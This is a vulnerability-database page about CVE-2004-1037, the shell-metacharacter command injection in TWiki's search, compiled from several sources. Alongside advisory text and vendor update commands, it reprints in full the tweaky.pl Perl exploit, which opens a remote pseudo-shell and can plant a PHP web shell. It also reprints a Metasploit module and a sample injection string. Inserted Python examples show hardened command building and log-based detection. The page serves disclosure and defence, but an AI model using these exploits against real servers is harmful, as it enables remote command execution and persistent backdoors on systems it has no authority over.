CVE-2004-1037
CVSS 10.0
Published: 2005-03-01 00:00:00
Revised: 2016-10-17 22:50:54

[Original] The search function in TWiki 20030201 allows remote attackers to execute arbitrary commands via shell metacharacters in a search string.


[CNNVD] TWiki Search Function Arbitrary Shell Command Execution Vulnerability (CNNVD-200503-031)

        TWiki is a flexible, powerful, secure and simple web-based collaboration platform.
        TWiki's search function does not properly filter the user-supplied search string before it is placed on a shell command line. A remote attacker who submits a search string containing shell metacharacters (a single quote to terminate the quoted search argument, followed by a command separator such as ';' or '|') can execute arbitrary shell commands with the privileges of the web server (CGI) process.
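The mechanism described above, as an added example that is not part of this page or of TWiki's own code. The shape of the grep invocation (`fgrep -i -l -- '<search>' <topic files>`) is inferred from the injection strings in the tweaky.pl exploit and the sample payload in the BID entry further down this page, and is an assumption; the topic file names are constructed. The vulnerable builder interpolates the raw search string into a shell line, the two hardened variants either quote it with `shlex.quote()` or hand an argv list to the kernel without a shell, and `command_count()` shows how many commands a POSIX shell would actually run for each form.

```python
import shlex

# Constructed sample inputs (not real traffic). BID_PAYLOAD follows the shape of
# the example given in the BID 11674 entry on this page: close the quoted search
# word, run commands, then reopen the quote so the command's own trailing quote
# still pairs up.
BENIGN_SEARCH = "WebHome"
BID_PAYLOAD = (r"doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/';"
               r" fgrep -i -l -- 'doesnotexist2")
TOPIC_FILES = ["WebHome.txt", "WebSearch.txt"]  # assumed topic files in the web's data dir


def build_shell_command(search, files=TOPIC_FILES):
    """Vulnerable pattern (assumed shape of the CGI's grep call): the raw search
    string is dropped into a single-quoted word and the whole line goes to
    /bin/sh, so a quote in the input ends the word and everything after it is
    parsed as shell syntax."""
    return "fgrep -i -l -- '%s' %s" % (search, " ".join(files))


def build_quoted_shell_command(search, files=TOPIC_FILES):
    """Still goes through a shell, but shlex.quote() emits a word the shell
    cannot be broken out of (each embedded ' becomes '"'"')."""
    return "fgrep -i -l -- %s %s" % (
        shlex.quote(search), " ".join(shlex.quote(f) for f in files))


def build_argv(search, files=TOPIC_FILES):
    """Hardened form: an argv list for execve-style execution, e.g.
    subprocess.run(argv) with no shell. Metacharacters are inert, and '--'
    stops a search beginning with '-' from being read as a grep option."""
    return ["fgrep", "-i", "-l", "--", search] + list(files)


def shell_words(command):
    """Tokenise a command line the way a POSIX shell would, keeping ';', '|',
    '(' and ')' as separate tokens (Python 3.8+: punctuation_chars together
    with whitespace_split)."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def command_count(command):
    """Number of simple commands the shell would run: one more than the number
    of ';' and '|' separators that end up outside quotes."""
    return 1 + sum(1 for tok in shell_words(command) if tok in (";", "|"))


if __name__ == "__main__":
    for label, search in (("benign", BENIGN_SEARCH), ("injected", BID_PAYLOAD)):
        print(label, "interpolated :", command_count(build_shell_command(search)), "command(s)")
        print(label, "shlex.quote  :", command_count(build_quoted_shell_command(search)), "command(s)")
        print(label, "argv         :", build_argv(search))
```

With the interpolated form the BID payload turns one `fgrep` into five commands; with `shlex.quote()` or the argv list the whole payload stays a single literal search argument, which is what the vendor's upgrade has to achieve one way or another.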
        

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:gentoo:linux  Gentoo Linux
cpe:/a:twiki:twiki:2003-02-01

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1037
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1037
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-031
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2004-11/0201.html
(UNKNOWN)  FULLDISC  20041116 Re: [Full-Disclosure] TWiki search function allows arbitrary shell command execution
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000918
(UNKNOWN)  CONECTIVA  CLA-2005:918
http://marc.info/?l=bugtraq&m=110037207516456&w=2
(UNKNOWN)  BUGTRAQ  20041112 TWiki search function allows arbitrary shell command execution
http://security.gentoo.org/glsa/glsa-200411-33.xml
(UNKNOWN)  GENTOO  GLSA-200411-33
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
(UNKNOWN)  CONFIRM  http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
http://www.ciac.org/ciac/bulletins/p-039.shtml
(UNKNOWN)  CIAC  P-039
http://www.securityfocus.com/bid/11674
(VENDOR_ADVISORY)  BID  11674
http://xforce.iss.net/xforce/xfdb/18062
(VENDOR_ADVISORY)  XF  twik-search-command-execution(18062)

- Vulnerability information (CNNVD)

TWiki Search Function Arbitrary Shell Command Execution Vulnerability
Severity: Critical   Type: Input validation
Published: 2005-03-01 00:00:00   Updated: 2005-10-20 00:00:00
Attack vector: Remote
        TWiki is a flexible, powerful, secure and simple web-based collaboration platform.
        TWiki's search function does not properly filter the user-supplied search string before it is placed on a shell command line. A remote attacker who submits a search string containing shell metacharacters (a single quote to terminate the quoted search argument, followed by a command separator such as ';' or '|') can execute arbitrary shell commands with the privileges of the web server (CGI) process.

- Advisories and patches

        No data

- Vulnerability information (642)

TWiki 20030201 search.pm Remote Command Execution Exploit (EDBID:642)
cgi webapps
2004-11-20 Verified
0 RoMaNSoFt
N/A
#!/usr/bin/perl

# "tweaky.pl" v. 1.0 beta 2
#
# Proof of concept for TWiki vulnerability. Remote code execution
# Vuln discovered, researched and exploited by RoMaNSoFt <roman rs-labs com>
#
# Madrid, 30.Sep.2004.


require LWP::UserAgent;
use Getopt::Long;

### Default config
$host = '';
$path = '/cgi-bin/twiki/search/Main/';
$secure = 0;
$get = 0;
$post = 0;
$phpshellpath='';
# Shell pipeline that writes a minimal PHP shell to $phpshellpath; kept on a single
# line because an embedded newline would terminate the injected command.
$createphpshell = '(echo `perl -e \'print chr(60).chr(63)\'` ; echo \'$out = shell_exec($_GET["cmd"]." 2\'`perl -e \'print chr(62).chr(38)\'`\'1");\' ; echo \'echo "\'`perl -e \'print chr(60)."pre".chr(62)."\\\\$out".chr(60)."/pre".chr(62)\'`\'";\' ; echo `perl -e \'print chr(63).chr(62)\'`) | tee ';
$logfile = ''; # If empty, logging will be disabled
$prompt = "tweaky\$ ";
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)';
$proxy = '';
$proxy_user = '';
$proxy_pass = '';
$basic_auth_user = '';
$basic_auth_pass = '';
$timeout = 30;
$debug = 0;
$init_command = 'uname -a ; id';
$start_mark = 'AAAA';
$end_mark = 'BBBB';
$pre_string = 'nonexistantttt\' ; (';
$post_string = ') | sed \'s/\(.*\)/'.$start_mark.'\1'.$end_mark.'.txt/\' ; fgrep -i -l -- \'nonexistantttt';
$delim_start = '<b>'.$start_mark;
$delim_end = $end_mark.'</b>';

print "Proof of concept for TWiki vulnerability. Remote code execution.\n";
print "(c) RoMaNSoFt, 2004. <roman\@rs-labs.com>\n\n";

### User-supplied config (read from the command-line)
$parsing_ok = GetOptions ('host=s' => \$host,
'path=s' => \$path,
'secure' => \$secure,
'get' => \$get,
'post' => \$post,
'phpshellpath=s' => \$phpshellpath,
'logfile=s' => \$logfile,
'init_command=s' => \$init_command,
'useragent=s' => \$useragent,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'basic_auth_user=s' => \$basic_auth_user,
'basic_auth_pass=s' => \$basic_auth_pass,
'timeout=i' => \$timeout,
'debug' => \$debug,
'start_mark=s' => \$start_mark,
'end_mark=s' => \$end_mark);

### Some basic checks
&banner unless ($parsing_ok);

if ($get and $post) {
print "Choose one only method! (GET or POST)\n\n";
&banner;
}

if (!($get or $post)) {
# If not specified we prefer POST method
$post = 1;
}

if (!$host) {
print "You must specify a target hostname! (tip: --host <hostname>)\n\n" ;
&banner;
}

$url = ($secure ? 'https' : 'http') . "://" . $host . $path;

### Checking for a vulnerable TWiki
&run_it ($init_command, 'RS-Labs rlz!');

### Execute selected payload

if ($phpshellpath) {
&create_phpshell;
print "PHPShell created.";
} else {
&pseudoshell;
}

### End
exit(0);


### Create PHPShell
sub create_phpshell {
$createphpshell .= $phpshellpath;
&run_it($createphpshell, 'yeah!');
}


### Pseudo-shell
sub pseudoshell {
open(LOGFILE, ">>$logfile") if $logfile;
open(STDINPUT, '-');

print "Welcome to RoMaNSoFt's pseudo-interactive shell :-)\n[Type Ctrl-D or (bye, quit, exit, logout) to exit]\n\n".$prompt.$init_command."\n";
&run_it ($init_command);
print $prompt;

while (<STDINPUT>) {
chop;
if ($_ eq "bye" or $_ eq "quit" or $_ eq "exit" or $_ eq "logout") {
exit(1);
}

&run_it ($_) unless !$_;
print "\n".$prompt;
}

close(STDINPUT);
close(LOGFILE) if $logfile;
}


### Print banner and die
sub banner {
print "Syntax: ./tweaky.pl --host=<host> [options]\n\n";
print "Proxy options: --proxy=http://proxy:port --proxy_user=foo --proxy_pass=bar\n";
print "Basic auth options: --basic_auth_user=foo --basic_auth_pass=bar\n";
print "Secure HTTP (HTTPS): --secure\n";
print "Path to CGI: --path=$path\n";
print "Method: --get | --post\n";
print "Enable logging: --logfile=/path/to/a/file\n";
print "Create PHPShell: --phpshellpath=/path/to/phpshell\n";

exit(1);
}


### Execute command via vulnerable CGI
sub run_it {
my ($command, $testing_vuln) = @_;
my $req;
my $ua = new LWP::UserAgent;

$ua->agent($useragent);
$ua->timeout($timeout);

# Build CGI param and urlencode it
my $search = $pre_string . $command . $post_string;
$search =~ s/(\W)/"%" . unpack("H2", $1)/ge;

# Case GET
if ($get) {
$req = HTTP::Request->new('GET', $url . "?scope=text&order=modified&search=$search");
}

# Case POST
if ($post) {
$req = new HTTP::Request POST => $url;
$req->content_type('application/x-www-form-urlencoded');
$req->content("scope=text&order=modified&search=$search");
}

# Proxy definition
if ($proxy) {
if ($secure) {
# HTTPS request
$ENV{HTTPS_PROXY} = $proxy;
$ENV{HTTPS_PROXY_USERNAME} = $proxy_user;
$ENV{HTTPS_PROXY_PASSWORD} = $proxy_pass; 
} else {
# HTTP request
$ua->proxy(['http'] => $proxy);
$req->proxy_authorization_basic($proxy_user, $proxy_pass); 
}
}

# Basic Authorization
$req->authorization_basic($basic_auth_user, $basic_auth_pass) if ($basic_auth_user);

# Launch request and parse results
my $res = $ua->request($req);

if ($res->is_success) {

print LOGFILE "\n".$prompt.$command."\n" if ($logfile and !$testing_vuln);
@content = split("\n", $res->content);

my $empty_response = 1;

foreach $_ (@content) {
my ($match) = ($_ =~ /$delim_start(.*)$delim_end/g);

if ($debug) {
print $_ . "\n";
} else {
if ($match) {
$empty_response = 0;
print $match . "\n" unless ($testing_vuln);
}
}

print LOGFILE $match . "\n" if ($match and $logfile and !$testing_vuln);
}

if ($empty_response) {
if ($testing_vuln) {
die "Sorry, exploit didn't work!\nPerhaps TWiki is patched or you supplied a wrong URL (remember it should point to Twiki's search page).\n";
} else {
print "[Server issued an empty response. Perhaps you entered a wrong command?]\n";
}
}

} else {
die "Couldn't connect to server. Error message follows:\n" . $res->status_line . "\n";
} 
}

# milw0rm.com [2004-11-20]
		

- Vulnerability information (16894)

TWiki Search Function Arbitrary Command Execution (EDBID:16894)
php webapps
2010-07-03 Verified
0 metasploit
N/A
##
# $Id: twiki_search.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TWiki Search Function Arbitrary Command Execution',
			'Description'    => %q{
					This module exploits a vulnerability in the search component of TWiki.
				By passing a 'search' parameter containing shell metacharacters to the
				'WebSearch' script, an attacker can execute arbitrary OS commands.
			},
			'Author'         =>
				[
					# Unknown - original discovery
					'jduck'       # metasploit version
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					[ 'CVE', '2004-1037' ],
					[ 'OSVDB', '11714' ],
					[ 'BID', '11674' ],
					[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
				],
			'Privileged'     => true, # web server context
			'Payload'        =>
				{
					'DisableNops' => true,
					'BadChars'    => ' ',
					'Space'       => 1024,
				},
			'Platform'       => [ 'unix' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Oct 01 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
			], self.class)
	end


	def check
		content = rand_text_alphanumeric(16+rand(16))
		test_file = rand_text_alphanumeric(8+rand(8))
		cmd_base = datastore['URI'] + '/view/Main/WebSearch?search='
		test_url = datastore['URI'] + '/view/Main/' + test_file

		# first see if it already exists (it really shouldn't)
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.body.match(content))
			print_error("WARNING: The test file exists already!")
			return Exploit::CheckCode::Safe
		end

		# try to create it
		print_status("Attempting to create #{test_url} ...")
		search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'"
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(search)
			}, 25)
		if (not res) or (res.code != 200)
			return Exploit::CheckCode::Safe
		end

		# fetch the topic the injected echo should have created; its body must contain the marker
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (not res.body.match(content))
			return Exploit::CheckCode::Safe
		end

		# delete the tmp file
		print_status("Attempting to delete #{test_url} ...")
		search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'"
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(search)
			}, 25)
		if (not res) or (res.code != 200)
			print_error("WARNING: unable to remove test file (#{test_file})")
		end

		return Exploit::CheckCode::Vulnerable
	end


	def exploit

		search = rand_text_alphanumeric(1+rand(8))
		search << "';" + payload.encoded + ";#\'"

		query_str = datastore['URI'] + '/view/Main/WebSearch'
		query_str << '?search='
		query_str << Rex::Text.uri_encode(search)

		res = send_request_cgi({
				'method'    => 'GET',
				'uri'	      => query_str,
			}, 25)

		if (res and res.code == 200)
			print_status("Successfully sent exploit request")
		else
			raise RuntimeError, "Error sending exploit request"
		end

		handler
	end

end
		

- Vulnerability information (F86541)

TWiki Search Function Arbitrary Command Execution (PacketStormID:F86541)
2010-02-23 00:00:00
 
exploit,arbitrary,shell
CVE-2004-1037

This Metasploit module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to the 'WebSearch' script, an attacker can execute arbitrary OS commands.

(Module source omitted here: it is the earlier revision of the same Metasploit module listed above as EDBID 16894, stamped `$Id: twiki_search.rb 8578 2010-02-21 20:31:09Z jduck $` / `$Revision: 8578 $`, and differs only in the revision stamps and indentation.)
    

- Vulnerability information (F35068)

tweaky.pl (PacketStormID:F35068)
2004-11-20 00:00:00
Roman Medina-Heigl Hernandez aka RoMaNSoFt  rs-labs.com
exploit,remote,perl,code execution
CVE-2004-1037

TWiki Release 01-Feb-2003 and below remote code execution exploit in perl.

- Vulnerability information (OSVDB)

OSVDB 11714
TWiki Search Function Arbitrary Command Execution
Location: Remote / Network Access; Attack type: Input Manipulation
Impact: Loss of Integrity; Solution: Upgrade
Exploit: Exploit Public, Exploit Commercial; Disclosure: Vendor Verified, Uncoordinated Disclosure, Discovered in the Wild

- Vulnerability description

TWiki contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is triggered when specially crafted shell metacharacters are passed in the search parameter, which is not validated.

- Timeline

2004-11-13 2004-11-12
2004-10-01 2004-11-13

- Solution

Upgrade to version 02Sep2004 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Credit

Unknown or Incomplete

- Vulnerability information (SecurityFocus BID)

TWiki Search Shell Metacharacter Remote Arbitrary Command Execution Vulnerability
Class: Input Validation Error; BID 11674
Remote: Yes; Local: No
Published: 2004-11-12 12:00:00; Updated: 2009-07-12 08:06:00
Discovery is credited to Markus Goetz, Joerg Hoh, Michael Holzt, Florian Laws, Hans Ulrich Niedermann, Andreas Thienemann, Peter Thoeny, and Florian Weimer.

- Affected program versions

TWiki TWiki 20040901
TWiki TWiki 20030201
TWiki TWiki 01-Feb-2003
TWiki TWiki 01-Dec-2001
TWiki TWiki 01-Dec-2000
Gentoo Linux
Conectiva Linux 10.0

- Not affected program versions

TWiki TWiki 20040902

- Vulnerability discussion

TWiki is reported prone to a shell metacharacter remote command execution vulnerability. This issue may allow an attacker to gain unauthorized access to a vulnerable computer by executing arbitrary commands.

TWiki 20030201 is reported vulnerable to this issue; however, it is likely that other versions are affected as well.

- Exploitation

An exploit is not required.

The following examples are available:
doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2

runvirus has supplied the exploit code Twiki-20030201-exec.pl.
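Detection over web server access logs, as an added example that is not from this page, from TWiki or from the exploits above. The log lines are constructed; the two injection strings follow the BID example above and the `${IFS}` form the Metasploit module on this page uses for spaces, and the two request paths checked (`/search/` and `/WebSearch`) are the ones the tweaky.pl and Metasploit exploits on this page target. The scanner decodes the `search` query parameter of each search request and flags terms containing characters that matter to /bin/sh.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Apache combined-log line: client, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters a wiki search term should never need but /bin/sh acts on: the
# quote that closes the grep argument, separators, pipes, redirections,
# backticks and $ (which also catches ${IFS}, the space substitute used by the
# Metasploit module on this page).
SHELL_META = re.compile(r"[;|&`$<>'\"\n]")

# Request paths that reach TWiki's search code: the 'search' CGI used by
# tweaky.pl and the WebSearch topic used by the Metasploit module.
SEARCH_PATH = re.compile(r"/search/|/WebSearch$")


def search_param(target):
    """Decoded 'search' query parameter of a request aimed at TWiki search,
    or None if the request is not a search at all."""
    parts = urlsplit(target)
    if not SEARCH_PATH.search(parts.path):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("search")
    return values[0] if values else None


def scan(log_text):
    """One finding per request whose search term contains shell metacharacters."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        term = search_param(m["target"])
        if term is None:
            continue
        metas = sorted(set(SHELL_META.findall(term)))
        if metas:
            findings.append({"client": m["client"], "ts": m["ts"],
                             "search": term, "metachars": metas})
    return findings


# --- constructed sample log (not real traffic) -------------------------------
def access_log_line(target, ua="Mozilla/4.0"):
    return ('203.0.113.7 - - [12/Nov/2004:10:15:02 +0100] "GET %s HTTP/1.1" '
            '200 4410 "-" "%s"' % (target, ua))


BID_PAYLOAD = (r"doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/';"
               r" fgrep -i -l -- 'doesnotexist2")
MSF_STYLE = "42';echo${IFS}marker${IFS}>probe.txt;#'"  # shape of the module's check() probe

SAMPLE_LOG = "\n".join([
    access_log_line("/twiki/bin/view/Main/WebSearch?search=WebHome&scope=text"),
    access_log_line("/cgi-bin/twiki/search/Main/?scope=text&order=modified&search="
                    + quote(BID_PAYLOAD, safe="")),
    access_log_line("/twiki/bin/view/Main/WebSearch?search=" + quote(MSF_STYLE, safe="")),
    access_log_line("/twiki/bin/view/Main/WebHome"),
])

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["client"], f["metachars"], repr(f["search"]))
```

Two caveats when running this against real logs: tweaky.pl defaults to POST, so its search string sits in the request body and never reaches an access log (you need request-body logging or a capture), and TWiki searches are regular expressions, so a legitimate `|` alternation will trip the `|` check and should be weighed against the other characters flagged.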

- Solution

Gentoo has released a security advisory (GLSA 200411-33) and an updated ebuild to address this vulnerability. Gentoo users are advised to execute the following sequence of commands as the superuser in order to apply the update:
emerge --sync
emerge --ask --oneshot --verbose ">=www-apps/twiki-20040902"

Conectiva Linux has made advisory CLA-2005:918 available dealing with this issue. Please see the referenced advisory for more information.

The vendor has made an update available dealing with this issue.

Conectiva Linux 10.0: see CLA-2005:918.

- References

About the SCAP Chinese Community

The SCAP Chinese Community (SCAP中文社区) is the first Chinese-language open community centred on SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE; their official data sources are maintained on MITRE's websites.